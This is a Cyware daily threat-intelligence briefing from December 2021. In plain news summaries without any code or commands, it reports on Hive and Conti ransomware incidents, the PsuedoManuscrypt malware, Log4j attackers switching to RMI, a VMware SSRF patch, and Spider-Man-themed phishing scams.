Go to listing page

Cyware Daily Threat Intelligence, December 17, 2021

Cyware Daily Threat Intelligence, December 17, 2021

Share Blog Post

Looks like Hive ransomware is on a mission to take the center stage in the ransomware landscape. The relatively new malware has emerged as the most active ransomware as it added more than 350 organizations to its list of victims in just four months. Researchers estimate the gang’s profits in millions of dollars between October and November alone.

The ongoing attacks on Apache Log4j take a new turn as hackers shift to Remote Method Invocation (RMI) to maximize the chance of success. This will enable attackers to bypass additional checks and constraints placed by security experts. In another emerging threat, a new malware dubbed PsuedoManuscrypt has been found infecting thousands of ICS computers across 195 countries.

Top Breaches Reported in the Last 24 Hours

McMenamins targeted
Hotel and brewpub chain McMenamins was hit badly by Conti ransomware. The attack occurred last week, following which sensitive data belonging to employees was exposed. The company had to shut down its IT systems, PoS systems, and corporate emails to prevent the further spread of the attack.

Hive breaches over 350 organizations
Hive ransomware has managed to breach over 350 organizations since its emergence in June. The initial compromise methods of the group include phishing emails and compromised VPN credentials.

IT recruitment firm discloses about an attack
Finite Recruitment confirmed a cyberattack that occurred in October. This affected a small subset of the company’s data that was later published on the dark web. Among the data stolen were financial records, contracts, and customers’ personal details.
 
Top Malware Reported in the Last 24 Hours

New PsuedoManuscrypt malware
A new malware dubbed PsuedoManuscrypt has infected over 35,000 computers in 195 countries. At least 7% of these computers are used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors. The malware is distributed via pirated software installer archives.

Hackers use RMI to evade detection
Hackers exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI (Remote Method Invocation) to maximize the chance of success. This will enable attackers to bypass additional checks and constraints placed by security experts.

Top Vulnerabilities Reported in the Last 24 Hours

VMware announces patches
VMware announced the release of patches for a critical SSRF vulnerability in Workspace ONE UEM console. Tracked as CVE-2021-22054, the flaws can allow attackers to access sensitive data in the management console.

Top Scams Reported in the Last 24 Hours

Scammers leverage newly released movie
Phishers are leveraging the latest Spider-Man movie to spread malicious files and phishing pages. The phishing pages purport to show the movie online, following which the users are asked to register their name and enter their credit card information. While the money of the victim gets deducted, they also do not get to watch the movie online.


 Tags

mcmenamins
vmware
psuedomanuscrypt
apache log4j
finite recruitment firm
hive ransomware

Posted on: December 17, 2021


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.